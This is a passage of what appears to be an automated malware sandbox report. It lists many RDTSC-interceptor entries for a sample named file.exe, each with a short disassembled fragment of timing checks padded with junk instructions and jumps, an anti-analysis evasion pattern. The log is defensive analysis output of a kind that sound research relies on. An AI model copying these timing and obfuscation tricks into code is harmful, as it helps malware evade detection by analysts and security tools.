              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B968B second address: 9B96BD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F3BACE24FDEh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3BACE24FDEh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B96BD second address: 9B96C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DE7 second address: 9B8DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DEB second address: 9B8E29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E17h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F3BAC7E5E1Dh 0x00000011 jmp 00007F3BAC7E5E17h 0x00000016 pushad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8E29 second address: 9B8E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F3BACE24FD6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8E38 second address: 9B8E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8E3C second address: 9B8E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3BACE24FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3BACE24FE2h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B90E8 second address: 9B9126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E16h 0x00000007 push edx 0x00000008 jmp 00007F3BAC7E5E16h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B93AC second address: 9B93B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B93B2 second address: 9B93DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3BAC7E5E0Ch 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9515 second address: 9B9521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C02F6 second address: 9C0314 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F3BAC7E5E10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F3BAC7E5E12h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0314 second address: 9C031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C031A second address: 9C031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C031E second address: 9C0324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0324 second address: 9C0328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0328 second address: 9C032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF0EE second address: 9BF0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3BAC7E5E06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF803 second address: 9BF80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DC77 second address: 98DC7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C76FD second address: 9C7701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7DEE second address: 9C7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3BAC7E5E06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7DF8 second address: 9C7E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BACE24FDFh 0x00000009 jmp 00007F3BACE24FDFh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8303 second address: 9C8309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAE0 second address: 96FAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAE5 second address: 96FAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAEB second address: 96FAEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8709 second address: 9C871F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C871F second address: 9C873D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3BACE24FE2h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C873D second address: 9C876F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F3BAC7E5E11h 0x0000000d jmp 00007F3BAC7E5E17h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FB2F second address: 98FB3D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FEAB second address: 98FEAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FFA8 second address: 98FFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990098 second address: 9900A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990205 second address: 990228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3BACE24FD6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c xchg eax, esi 0x0000000d jp 00007F3BACE24FDBh 0x00000013 sbb cx, 25EFh 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007F3BACE24FDCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990228 second address: 99022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990353 second address: 990370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BACE24FE9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990370 second address: 990383 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990383 second address: 990387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990387 second address: 99038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99038B second address: 99039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990AFC second address: 990B20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a ja 00007F3BAC7E5E17h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990C95 second address: 990CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3BACE24FDAh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990CA7 second address: 990CDB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3BAC7E5E08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F3BAC7E5E0Ah 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jg 00007F3BAC7E5E0Ch 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pushad 0x00000027 popad 0x00000028 pop ecx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990CDB second address: 990CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990CFC second address: 990D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990EC0 second address: 990EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990EC5 second address: 96FAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jnc 00007F3BAC7E5E0Ch 0x00000012 call dword ptr [ebp+122D2121h] 0x00000018 jmp 00007F3BAC7E5E18h 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC128 second address: 9CC12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC12E second address: 9CC132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC132 second address: 9CC138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC138 second address: 9CC13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC13E second address: 9CC144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC144 second address: 9CC175 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F3BAC7E5E12h 0x00000014 pushad 0x00000015 jmp 00007F3BAC7E5E0Dh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC299 second address: 9CC29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC29E second address: 9CC2BB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3BAC7E5E0Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jg 00007F3BAC7E5E06h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC2BB second address: 9CC2DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F3BACE24FD6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC2DD second address: 9CC2F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC721 second address: 9CC725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC725 second address: 9CC745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3BAC7E5E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F3BAC7E5E14h 0x00000012 jmp 00007F3BAC7E5E0Ch 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC745 second address: 9CC75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BACE24FE3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC893 second address: 9CC897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC897 second address: 9CC8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F3BACE24FDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC8A5 second address: 9CC8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC8A9 second address: 9CC8B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007F3BACE24FD6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC8B5 second address: 9CC8F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E0Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F3BAC7E5E0Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3BAC7E5E19h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1265 second address: 9D12A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F3BACE24FD6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F3BACE24FDCh 0x00000012 jns 00007F3BACE24FDEh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3BACE24FE8h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943022 second address: 943031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E0Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943031 second address: 94305E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3BACE24FD6h 0x00000008 jl 00007F3BACE24FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3BACE24FDFh 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F3BACE24FD6h 0x0000001d js 00007F3BACE24FD6h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3AED second address: 9D3B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F3BAC7E5E06h 0x0000000c popad 0x0000000d push esi 0x0000000e push edi 0x0000000f jmp 00007F3BAC7E5E0Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3CAA second address: 9D3CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3BACE24FD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3CB4 second address: 9D3CBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3DD7 second address: 9D3DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3DDD second address: 9D3DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3BAC7E5E06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6173 second address: 9D6177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6177 second address: 9D617D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D617D second address: 9D618E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3BACE24FE0h 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA1F7 second address: 9DA248 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F3BAC7E5E12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F3BAC7E5E18h 0x00000013 jnc 00007F3BAC7E5E06h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F3BAC7E5E0Ch 0x00000020 jnp 00007F3BAC7E5E0Eh 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9A89 second address: 9D9A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD3CC second address: 9DD3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F3BAC7E5E06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD518 second address: 9DD51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD51C second address: 9DD520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD853 second address: 9DD866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3BACE24FD6h 0x0000000a pop ebx 0x0000000b jc 00007F3BACE24FE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD866 second address: 9DD86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD86C second address: 9DD870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E445E second address: 9E4464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4464 second address: 9E4468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2CC9 second address: 9E2CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E0Bh 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2CD9 second address: 9E2CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F3BACE24FD6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F3BACE24FD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2CED second address: 9E2CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2CF1 second address: 9E2D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e je 00007F3BACE24FEDh 0x00000014 jmp 00007F3BACE24FE5h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2D2E second address: 9E2D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2F8E second address: 9E2FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BACE24FE8h 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2FB1 second address: 9E2FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3BAC7E5E06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2FBD second address: 9E2FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
